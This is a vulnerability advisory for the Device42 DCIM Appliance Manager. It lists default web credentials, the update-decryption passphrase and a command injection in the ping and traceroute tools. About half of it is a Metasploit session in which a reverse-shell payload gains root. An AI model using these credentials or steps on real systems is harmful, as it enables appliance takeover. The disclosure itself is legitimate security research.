Device42 Embedded Credentials

Type packetstorm
Reporter Brandon Perry
Modified 2014-11-26T00:00:00


                                            `Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0  
Device42 ships virtual appliances ready for production use as a trial  
(essentially dictated by the license provided).  
The Appliance Manager listens on HTTP (no SSL) on port 4242 with default  
credentials of d42admin:default.  
Within the Appliance Manager, the Ping and Traceroute utilities are  
susceptible to command injection via bash metacharacters. The user which  
the commands get executed under is the 'ubuntu' user, but this user has  
passwordless sudo ability, so it is essentially root access. Two exploits  
are provided that exploit these vulnerabilities using the default  
Updates from device42 are encrypted by default to prevent users from  
creating their own updates and uploading them, but the password for the  
encrypted zip file is 'pass:zofo8REgqM' so any user could create their own  
encrypted update using this passphrase.  
openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/ -pass  
Also, the root and ubuntu users have default passwords in the shadow file.  
Root –  
Ubuntu –  
msf exploit(device42_tracert_exec) > show options  
Module options (exploit/linux/http/device42_tracert_exec):  
Name Current Setting Required Description  
---- --------------- -------- -----------  
Proxies no Use a proxy chain  
RHOST yes The target address  
RPORT 4242 yes The target port  
VHOST no HTTP server virtual host  
Payload options (cmd/unix/reverse):  
Name Current Setting Required Description  
---- --------------- -------- -----------  
LHOST yes The listen address  
LPORT 4444 yes The listen port  
Exploit target:  
Id Name  
-- ----  
0 Automatic Targeting  
msf exploit(device42_tracert_exec) > exploit  
[*] Started reverse double handler  
[*] Accepted the first client connection...  
[*] Accepted the second client connection...  
[*] Command: echo YWFxSIuVtNUMShSi;  
[*] Writing to socket A  
[*] Writing to socket B  
[*] Reading from sockets...  
[*] Reading from socket A  
[*] A: "YWFxSIuVtNUMShSi\r\n"  
[*] Matching...  
[*] B is input...  
[*] Command shell session 3 opened ( ->  
at 2014-11-22 17:36:59 -0600  
sudo su  
uid=0(root) gid=0(root) groups=0(root)  
uid=1000(ubuntu) gid=1000(ubuntu)  
-- -- blog -- website